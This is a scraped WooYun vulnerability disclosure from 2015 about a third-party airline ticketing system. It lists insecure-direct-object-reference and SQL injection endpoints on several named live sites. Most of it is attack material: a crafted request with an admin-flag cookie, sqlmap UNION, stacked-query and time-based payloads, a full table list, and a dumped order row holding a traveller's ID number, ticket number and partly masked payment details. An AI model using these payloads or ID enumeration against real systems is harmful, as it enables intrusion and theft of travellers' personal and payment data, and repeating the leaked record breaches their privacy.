第三方某售票系统通用型五处越权和六处SQL注入泄露大量订单信息（姓名、手机、证件号、航班号和起飞时间等）

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0102525

漏洞标题：第三方某售票系统通用型五处越权和六处SQL注入泄露大量订单信息（姓名、手机、证件号、航班号和起飞时间等）

漏洞作者：路人甲

提交时间：2015-03-23 10:18

修复时间：2015-05-07 10:20

公开时间：2015-05-07 10:20

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-03-23：积极联系厂商并且等待厂商认领中，细节不对外公开
2015-05-07：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

越权能退票、查看人员信息等
SQL注入整理下，支持UNION，泄露支付细节

详细说明：

http://www.piaoyou.org/case_web.htm 票友软件的case
越权And注入总共10处打包：

1./Order/detail.aspx?id=38207
2./Order/Return_detail.aspx?id=37395&sid=59689
3./Order/view_detail.aspx?id=22141&sid=35171
4./Order/history_flight.aspx?id=3821
5./Financial/fksq_meb_mx.aspx?id=57
6./Json_db/flight_report.aspx?stype=&ptype=&ddw=1&sdate=2010-03-19&edate=2015-3-19&fs=&keyword=&col=id,sdate,ckbm,pnr,cjr,chahc,pnum,hb,cw,qfdate,price,shui,bxmoney,dtotal,bymoney,qianprice,tuimoney,kefu,lxr&_search=false&nd=1426769311306&rows=25&page=1&sidx=id&sord=desc

需要注册一个用户，注册账户所有的加*的都设定为13900000000即可快速注册

漏洞证明：

案例1.http://www.h-h.com.cn/
五处越权
1.http://www.h-h.com.cn/Order/detail.aspx?id=38207，遍历id即可获取所有订票人员信息，包括姓名、身份证、票号、起飞时间，而且还能越权申请退票等操作

2.http://www.h-h.com.cn/Order/view_detail.aspx?id=22141&sid=35171，同样可遍历id

3.http://www.h-h.com.cn/Order/Return_detail.aspx?id=37395&sid=59689，同样可遍历id

4.http://www.h-h.com.cn/Order/history_flight.aspx?id=3821

5.http://www.h-h.com.cn/Financial/fksq_meb_mx.aspx?id=57

六处注入：
1.http://www.h-h.com.cn/Order/detail.aspx?id=38207，需要抓包，类似如下，存到txt文件中即可注入

GET /Order/detail.aspx?id=38207 HTTP/1.1
Host: www.h-h.com.cn
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
Accept-Encoding: gzip, deflate, sdch
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Cookie: ASP.NET_SessionId=5hpnmhuxo0g0kp5is1xxyxxm; tktcookie=memberid=648&truename=15100000000&level=%e5%85%ac%e5%8f%b8%e5%ae%a2&yhzc=0&gjyhzc=0&yhfs=3&logo=&sh=0&bm=&username=Administrator&shgroup=admin&dbgroup=admin&flag=admin

2.http://www.h-h.com.cn/Order/Return_detail.aspx?id=37395&sid=59689 支持UNION

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=37395 AND 2068=2068&sid=59689
    Type: UNION query
    Title: Generic UNION query (NULL) - 16 columns
    Payload: id=37395 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(107)+CHAR(113)+CHAR(118)+CHAR(113)+CHAR(66)+CHAR(72)+CHAR(97)+CHAR(77)+CHAR(70)+CHAR(69)+CHAR(113)+CHAR(89)+CHAR(100)+CHAR(84)+CHAR(113)+CHAR(98)+CHAR(98)+CHAR(113)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- &sid=59689
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: id=37395; WAITFOR DELAY '0:0:5'--&sid=59689
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: id=37395 WAITFOR DELAY '0:0:5'--&sid=59689
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2005
Database: haihua_pek
+-------------------------+---------+
| Table                   | Entries |
+-------------------------+---------+
| dbo.money_mx            | 134786  |
| dbo.pay_money           | 134786  |
| dbo.sfkmx_view          | 126577  |
| dbo.pnr_history         | 121394  |
| dbo.pnrdetail           | 60521   |
| dbo.view_scgq           | 60521   |
| dbo.viewbmpnr           | 60521   |
| dbo.view_js             | 58679   |
| dbo.pnr                 | 38316   |
| dbo.viewpnr             | 38316   |
| dbo.Hotel_LandMarks     | 28601   |
| dbo.pay_money_main      | 19984   |
| dbo.view_pay_mx_main    | 19984   |
| dbo.cjr_login           | 19133   |
| dbo.soupiaoren          | 19133   |
| dbo.viewcjr             | 19133   |
| dbo.Hotel_StaticInfos   | 13442   |
| dbo.sfkmx_other_view    | 8209    |
| dbo.ft_City             | 5865    |
| dbo.sms                 | 5474    |
| dbo.view_tuipiao        | 4694    |
| dbo.tuipiao             | 4682    |
| dbo.member_yu           | 4277    |
| dbo.view_member_yu      | 4277    |
| dbo.ft_TAPrice          | 4063    |
| dbo.traininfo           | 2204    |
| dbo.yc_group            | 1329    |
| dbo.System_Warn         | 1154    |
| dbo.aircity             | 1070    |
| dbo.Roles_flag          | 1045    |
| dbo.Hotel_City          | 621     |
| dbo.member              | 618     |
| dbo.sms_key             | 468     |
| dbo.xcd_ps_main         | 454     |
| dbo.sfk_submit_mx       | 413     |
| dbo.money_other         | 397     |
| dbo.pay_money_other     | 397     |
| dbo.viewother           | 317     |
| dbo.company_clk         | 313     |
| dbo.piaobei             | 204     |
| dbo.cw_gd               | 189     |
| dbo.airpiao             | 186     |
| dbo.tourday             | 185     |
| dbo.Airways             | 183     |
| dbo.sys_nav             | 135     |
| dbo.Visor               | 131     |
| dbo.books               | 116     |
| dbo.gjqz                | 116     |
| dbo.air                 | 90      |
| dbo.salestable          | 76      |
| dbo.sfk_submit          | 58      |
| dbo.Tplanetype          | 50      |
| dbo.air_cab_class       | 49      |
| dbo.menu_s              | 44      |
| dbo.tourlist            | 41      |
| dbo.plane_xinhao        | 35      |
| dbo.orders_design       | 32      |
| dbo.piaodian            | 31      |
| dbo.Bank                | 28      |
| dbo.contact_info        | 28      |
| dbo.kefu                | 26      |
| dbo.Notebook            | 26      |
| dbo.oa_item             | 26      |
| dbo.view_kefu           | 26      |
| dbo.Hotel_PageSumInfo   | 20      |
| dbo.bm_login            | 19      |
| dbo.company_bm          | 19      |
| dbo.gjticket            | 19      |
| dbo.viewgjticket        | 19      |
| dbo.tournews            | 18      |
| dbo.company_flag        | 17      |
| dbo.bx_base             | 16      |
| dbo.link                | 16      |
| dbo.cwkou               | 15      |
| dbo.tourline            | 15      |
| dbo.payfs               | 14      |
| dbo.bx_product          | 13      |
| dbo.menu_b              | 13      |
| dbo.resms               | 12      |
| dbo.cgimg               | 10      |
| dbo.otherclass          | 10      |
| dbo.Roles               | 10      |
| dbo.cjrcard             | 9       |
| dbo.jbitem              | 9       |
| dbo.system_tx           | 9       |
| dbo.Report_mb           | 8       |
| dbo.travel_money        | 8       |
| dbo.kefubm              | 6       |
| dbo.Report_mb_member    | 6       |
| dbo.wtgroup             | 6       |
| dbo.ptype_set           | 5       |
| dbo.shop_smallclass     | 5       |
| dbo.wttgclass           | 5       |
| dbo.b2b_users           | 4       |
| dbo.company_center      | 4       |
| dbo.tourclass           | 4       |
| dbo.travel_order_detail | 4       |
| dbo.view_travel_order   | 4       |
| dbo.message_mb          | 3       |
| dbo.tourbig             | 3       |
| dbo.travel_order        | 3       |
| dbo.fax_submit          | 2       |
| dbo.Invoice             | 2       |
| dbo.shop_bigclass       | 2       |
| dbo.admin               | 1       |
| dbo.ft_Config           | 1       |
| dbo.OtherParm           | 1       |
| dbo.System_info         | 1       |
| dbo.travel_item         | 1       |
+-------------------------+---------+

6W+的支付细节暴露

abase: haihua_pek
Table: pnrdetail
[1 entry]
+----+-----+----------+-------+----+--------+--------+-------+-----+---------+------------+-----+-----+----------------+------+--------+---------+--------------------+------+------+--------------------+-------+--------+-------+-----------+---------+-------+--------------------+--------+--------+---------+--------+------------+--------+---------+---------+---------+---------+---------+---------+---------+---------+---------+--------------------+----------+----------+----------+----------+----------+----------+----------+--------------------+----------+----------+----------------+-------------+----------+-----------+-----------+-----------+-----------+-----------+------------+------------+------------+-------------+--------------+
| id | sid | memberid | cn    | cw | hb     | hc     | yq    | qj  | pmj     | Pnr        | cjr | kou | pnum           | kefu | shui   | ckbm    | docs               | fksq | jszt | sdate              | yh100 | price  | cwkou | chahc     | djnum   | stype | stime              | dtotal | zfshui | bx_num  | yprice | qfdate     | huikou | service | limoney | content | jsprice | endtime | jiangli | hfmoney | bymoney | bxprice | shifdate           | skzhekou | fkzhekou | del_flag | jinprice | printnum | fk_djnum | shifbank | shisdate           | username | agentpay | shisbank       | ckmobile    | agentfei | bankmoney | yhfandian | companycb | fenduanys | itemclass | fenduankou | bankobject | air_hf_get | planexinhao | fenduanprice |
+----+-----+----------+-------+----+--------+--------+-------+-----+---------+------------+-----+-----+----------------+------+--------+---------+--------------------+------+------+--------------------+-------+--------+-------+-----------+---------+-------+--------------------+--------+--------+---------+--------+------------+--------+---------+---------+---------+---------+---------+---------+---------+---------+---------+--------------------+----------+----------+----------+----------+----------+----------+----------+--------------------+----------+----------+----------------+-------------+----------+-----------+-----------+-----------+-----------+-----------+------------+------------+------------+-------------+--------------+
| 10 | 10  | 1        | 50.00 | Y  | CA8905 | DLCPEK | 60.00 | 710 | 640+110 | HEE8LJ     | 魏** | 3+0 | 999-4895108231 | ZC   | 110.00 | <blank> | 149001197804114722 | 0    | 2    | 06  1 2014 12:00AM | 100   | 628.43 | 100%  | 大连-北京首都机场 | <blank> | 已出票   | 01  1 1900 11:12AM | 738.43 | 110.00 | <blank> | 638.00 | 6-04 14:10 | 0.00   | 0.00    | 7.63    | <blank> | 640.00  | 15:35/  | 0.00    | 0.00    | 738.43  | 0*20    | 06  1 2014 12:00AM | 0.00     | 0.00     | 0        | 730.80   | <blank>  | <blank>  | 工行BSP    | 06  1 2014 12:00AM | TB       | 网银支付     | 支付宝(846***226) | 186***118 | 730.80   | 0.00      | 1.5+0     | <blank>   | <blank>   | 0         | <blank>    | 0          | 0.00       | <blank>     | <blank>      |
+----+-----+----------+-------+----+--------+--------+-------+-----+---------+------------+-----+-----+----------------+------+--------+---------+--------------------+------+------+--------------------+-------+--------+-------+-----------+---------+-------+--------------------+--------+--------+---------+--------+------------+--------+---------+---------+---------+---------+---------+---------+---------+---------+---------+--------------------+----------+----------+----------+----------+----------+----------+----------+--------------------+----------+----------+----------------+-------------+----------+-----------+-----------+-----------+-----------+-----------+------------+------------+------------+-------------+--------------+

3.http://www.h-h.com.cn/Order/Return_detail.aspx?id=37395&sid=59689

4.http://www.h-h.com.cn/Order/history_flight.aspx?id=3821

5.http://www.h-h.com.cn/Financial/fksq_meb_mx.aspx?id=57

6.http://www.h-h.com.cn/Json_db/flight_report.aspx?stype=&ptype=&ddw=1&sdate=2010-03-19&edate=2015-3-19&fs=&keyword=&col=id,sdate,ckbm,pnr,cjr,chahc,pnum,hb,cw,qfdate,price,shui,bxmoney,dtotal,bymoney,qianprice,tuimoney,kefu,lxr&_search=false&nd=1426769311306&rows=25&page=1&sidx=id&sord=desc

案例2.http://www.4008836868.com/
1.http://www.4008836868.com/Order/detail.aspx?id=38207，遍历id即可获取所有订票人员信息，包括姓名、护照和签证、票号、起飞时间，而且还能越权申请退票等操作

2.http://www.4008836868.com/Order/view_detail.aspx?id=11190&sid=35171，同样可遍历id

3.http://www.4008836868.com/Order/Return_detail.aspx?id=3700&sid=59689，同样可遍历id

六处注入：
1.http://www.4008836868.com/Order/detail.aspx?id=38207

2.http://www.4008836868.com/Order/view_detail.aspx?id=11190&sid=35171

3.http://www.4008836868.com/Order/Return_detail.aspx?id=3700&sid=59689，支持UNION

4.http://www.4008836868.com/Order/history_flight.aspx?id=3821

5.http://www.4008836868.com/Financial/fksq_meb_mx.aspx?id=57

6.http://www.4008836868.com/Json_db/flight_report.aspx?stype=&ptype=&ddw=1&sdate=2010-03-19&edate=2015-3-19&fs=&keyword=&col=id,sdate,ckbm,pnr,cjr,chahc,pnum,hb,cw,qfdate,price,shui,bxmoney,dtotal,bymoney,qianprice,tuimoney,kefu,lxr&_search=false&nd=1426769311306&rows=25&page=1&sidx=id&sord=desc

案例3.http://hhcl.h-h.com.cn/
五处越权
1.http://hhcl.h-h.com.cn/Order/detail.aspx?id=38207，遍历id即可获取所有订票人员信息，包括姓名、身份证、票号、起飞时间，而且还能越权申请退票等操作

2.http://hhcl.h-h.com.cn/Order/view_detail.aspx?id=22141&sid=35171，同样可遍历id

3.http://hhcl.h-h.com.cn/Order/Return_detail.aspx?id=37395&sid=59689，同样可遍历id

4.http://hhcl.h-h.com.cn/Order/history_flight.aspx?id=3821

5.http://hhcl.h-h.com.cn/Financial/fksq_meb_mx.aspx?id=57

六处注入：
1.http://hhcl.h-h.com.cn/Order/detail.aspx?id=38207，需要抓包，类似如下，存到txt文件中即可注入

GET /Order/detail.aspx?id=38207 HTTP/1.1
Host: www.h-h.com.cn
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
Accept-Encoding: gzip, deflate, sdch
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Cookie: ASP.NET_SessionId=5hpnmhuxo0g0kp5is1xxyxxm; tktcookie=memberid=648&truename=15100000000&level=%e5%85%ac%e5%8f%b8%e5%ae%a2&yhzc=0&gjyhzc=0&yhfs=3&logo=&sh=0&bm=&username=Administrator&shgroup=admin&dbgroup=admin&flag=admin

2.http://hhcl.h-h.com.cn/Order/Return_detail.aspx?id=37395&sid=59689 支持UNION

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=37395 AND 2068=2068&sid=59689
    Type: UNION query
    Title: Generic UNION query (NULL) - 16 columns
    Payload: id=37395 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(107)+CHAR(113)+CHAR(118)+CHAR(113)+CHAR(66)+CHAR(72)+CHAR(97)+CHAR(77)+CHAR(70)+CHAR(69)+CHAR(113)+CHAR(89)+CHAR(100)+CHAR(84)+CHAR(113)+CHAR(98)+CHAR(98)+CHAR(113)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- &sid=59689
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: id=37395; WAITFOR DELAY '0:0:5'--&sid=59689
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: id=37395 WAITFOR DELAY '0:0:5'--&sid=59689
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2005
Database: haihua_pek
+-------------------------+---------+
| Table                   | Entries |
+-------------------------+---------+
| dbo.money_mx            | 134786  |
| dbo.pay_money           | 134786  |
| dbo.sfkmx_view          | 126577  |
| dbo.pnr_history         | 121394  |
| dbo.pnrdetail           | 60521   |
| dbo.view_scgq           | 60521   |
| dbo.viewbmpnr           | 60521   |
| dbo.view_js             | 58679   |
| dbo.pnr                 | 38316   |
| dbo.viewpnr             | 38316   |
| dbo.Hotel_LandMarks     | 28601   |
| dbo.pay_money_main      | 19984   |
| dbo.view_pay_mx_main    | 19984   |
| dbo.cjr_login           | 19133   |
| dbo.soupiaoren          | 19133   |
| dbo.viewcjr             | 19133   |
| dbo.Hotel_StaticInfos   | 13442   |
| dbo.sfkmx_other_view    | 8209    |
| dbo.ft_City             | 5865    |
| dbo.sms                 | 5474    |
| dbo.view_tuipiao        | 4694    |
| dbo.tuipiao             | 4682    |
| dbo.member_yu           | 4277    |
| dbo.view_member_yu      | 4277    |
| dbo.ft_TAPrice          | 4063    |
| dbo.traininfo           | 2204    |
| dbo.yc_group            | 1329    |
| dbo.System_Warn         | 1154    |
| dbo.aircity             | 1070    |
| dbo.Roles_flag          | 1045    |
| dbo.Hotel_City          | 621     |
| dbo.member              | 618     |
| dbo.sms_key             | 468     |
| dbo.xcd_ps_main         | 454     |
| dbo.sfk_submit_mx       | 413     |
| dbo.money_other         | 397     |
| dbo.pay_money_other     | 397     |
| dbo.viewother           | 317     |
| dbo.company_clk         | 313     |
| dbo.piaobei             | 204     |
| dbo.cw_gd               | 189     |
| dbo.airpiao             | 186     |
| dbo.tourday             | 185     |
| dbo.Airways             | 183     |
| dbo.sys_nav             | 135     |
| dbo.Visor               | 131     |
| dbo.books               | 116     |
| dbo.gjqz                | 116     |
| dbo.air                 | 90      |
| dbo.salestable          | 76      |
| dbo.sfk_submit          | 58      |
| dbo.Tplanetype          | 50      |
| dbo.air_cab_class       | 49      |
| dbo.menu_s              | 44      |
| dbo.tourlist            | 41      |
| dbo.plane_xinhao        | 35      |
| dbo.orders_design       | 32      |
| dbo.piaodian            | 31      |
| dbo.Bank                | 28      |
| dbo.contact_info        | 28      |
| dbo.kefu                | 26      |
| dbo.Notebook            | 26      |
| dbo.oa_item             | 26      |
| dbo.view_kefu           | 26      |
| dbo.Hotel_PageSumInfo   | 20      |
| dbo.bm_login            | 19      |
| dbo.company_bm          | 19      |
| dbo.gjticket            | 19      |
| dbo.viewgjticket        | 19      |
| dbo.tournews            | 18      |
| dbo.company_flag        | 17      |
| dbo.bx_base             | 16      |
| dbo.link                | 16      |
| dbo.cwkou               | 15      |
| dbo.tourline            | 15      |
| dbo.payfs               | 14      |
| dbo.bx_product          | 13      |
| dbo.menu_b              | 13      |
| dbo.resms               | 12      |
| dbo.cgimg               | 10      |
| dbo.otherclass          | 10      |
| dbo.Roles               | 10      |
| dbo.cjrcard             | 9       |
| dbo.jbitem              | 9       |
| dbo.system_tx           | 9       |
| dbo.Report_mb           | 8       |
| dbo.travel_money        | 8       |
| dbo.kefubm              | 6       |
| dbo.Report_mb_member    | 6       |
| dbo.wtgroup             | 6       |
| dbo.ptype_set           | 5       |
| dbo.shop_smallclass     | 5       |
| dbo.wttgclass           | 5       |
| dbo.b2b_users           | 4       |
| dbo.company_center      | 4       |
| dbo.tourclass           | 4       |
| dbo.travel_order_detail | 4       |
| dbo.view_travel_order   | 4       |
| dbo.message_mb          | 3       |
| dbo.tourbig             | 3       |
| dbo.travel_order        | 3       |
| dbo.fax_submit          | 2       |
| dbo.Invoice             | 2       |
| dbo.shop_bigclass       | 2       |
| dbo.admin               | 1       |
| dbo.ft_Config           | 1       |
| dbo.OtherParm           | 1       |
| dbo.System_info         | 1       |
| dbo.travel_item         | 1       |
+-------------------------+---------+

6W+的支付细节暴露

abase: haihua_pek
Table: pnrdetail
[1 entry]
+----+-----+----------+-------+----+--------+--------+-------+-----+---------+------------+-----+-----+----------------+------+--------+---------+--------------------+------+------+--------------------+-------+--------+-------+-----------+---------+-------+--------------------+--------+--------+---------+--------+------------+--------+---------+---------+---------+---------+---------+---------+---------+---------+---------+--------------------+----------+----------+----------+----------+----------+----------+----------+--------------------+----------+----------+----------------+-------------+----------+-----------+-----------+-----------+-----------+-----------+------------+------------+------------+-------------+--------------+
| id | sid | memberid | cn    | cw | hb     | hc     | yq    | qj  | pmj     | Pnr        | cjr | kou | pnum           | kefu | shui   | ckbm    | docs               | fksq | jszt | sdate              | yh100 | price  | cwkou | chahc     | djnum   | stype | stime              | dtotal | zfshui | bx_num  | yprice | qfdate     | huikou | service | limoney | content | jsprice | endtime | jiangli | hfmoney | bymoney | bxprice | shifdate           | skzhekou | fkzhekou | del_flag | jinprice | printnum | fk_djnum | shifbank | shisdate           | username | agentpay | shisbank       | ckmobile    | agentfei | bankmoney | yhfandian | companycb | fenduanys | itemclass | fenduankou | bankobject | air_hf_get | planexinhao | fenduanprice |
+----+-----+----------+-------+----+--------+--------+-------+-----+---------+------------+-----+-----+----------------+------+--------+---------+--------------------+------+------+--------------------+-------+--------+-------+-----------+---------+-------+--------------------+--------+--------+---------+--------+------------+--------+---------+---------+---------+---------+---------+---------+---------+---------+---------+--------------------+----------+----------+----------+----------+----------+----------+----------+--------------------+----------+----------+----------------+-------------+----------+-----------+-----------+-----------+-----------+-----------+------------+------------+------------+-------------+--------------+
| 10 | 10  | 1        | 50.00 | Y  | CA8905 | DLCPEK | 60.00 | 710 | 640+110 | HEE8LJ     | 魏** | 3+0 | 999-4895108231 | ZC   | 110.00 | <blank> | 149001197804114722 | 0    | 2    | 06  1 2014 12:00AM | 100   | 628.43 | 100%  | 大连-北京首都机场 | <blank> | 已出票   | 01  1 1900 11:12AM | 738.43 | 110.00 | <blank> | 638.00 | 6-04 14:10 | 0.00   | 0.00    | 7.63    | <blank> | 640.00  | 15:35/  | 0.00    | 0.00    | 738.43  | 0*20    | 06  1 2014 12:00AM | 0.00     | 0.00     | 0        | 730.80   | <blank>  | <blank>  | 工行BSP    | 06  1 2014 12:00AM | TB       | 网银支付     | 支付宝(846***226) | 186***118 | 730.80   | 0.00      | 1.5+0     | <blank>   | <blank>   | 0         | <blank>    | 0          | 0.00       | <blank>     | <blank>      |
+----+-----+----------+-------+----+--------+--------+-------+-----+---------+------------+-----+-----+----------------+------+--------+---------+--------------------+------+------+--------------------+-------+--------+-------+-----------+---------+-------+--------------------+--------+--------+---------+--------+------------+--------+---------+---------+---------+---------+---------+---------+---------+---------+---------+--------------------+----------+----------+----------+----------+----------+----------+----------+--------------------+----------+----------+----------------+-------------+----------+-----------+-----------+-----------+-----------+-----------+------------+------------+------------+-------------+--------------+

3.http://hhcl.h-h.com.cn/Order/Return_detail.aspx?id=37395&sid=59689

4.http://hhcl.h-h.com.cn/Order/history_flight.aspx?id=3821

5.http://hhcl.h-h.com.cn/Financial/fksq_meb_mx.aspx?id=57

6.http://hhcl.h-h.com.cn/Json_db/flight_report.aspx?stype=&ptype=&ddw=1&sdate=2010-03-19&edate=2015-3-19&fs=&keyword=&col=id,sdate,ckbm,pnr,cjr,chahc,pnum,hb,cw,qfdate,price,shui,bxmoney,dtotal,bymoney,qianprice,tuimoney,kefu,lxr&_search=false&nd=1426769311306&rows=25&page=1&sidx=id&sord=desc

修复方案：

越权验证session
注入id参数加整型转换，stype参数做下功能性的关键词匹配

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0102525

漏洞标题：第三方某售票系统通用型五处越权和六处SQL注入泄露大量订单信息（姓名、手机、证件号、航班号和起飞时间等）

相关厂商：票友软件

漏洞作者：路人甲

提交时间：2015-03-23 10:18

修复时间：2015-05-07 10:20

公开时间：2015-05-07 10:20

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0102525

漏洞标题：第三方某售票系统通用型五处越权和六处SQL注入泄露大量订单信息（姓名、手机、证件号、航班号和起飞时间等）

相关厂商：票友软件

漏洞作者： 路人甲

提交时间：2015-03-23 10:18

修复时间：2015-05-07 10:20

公开时间：2015-05-07 10:20

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：未联系到厂商或者厂商积极忽略

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0102525"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云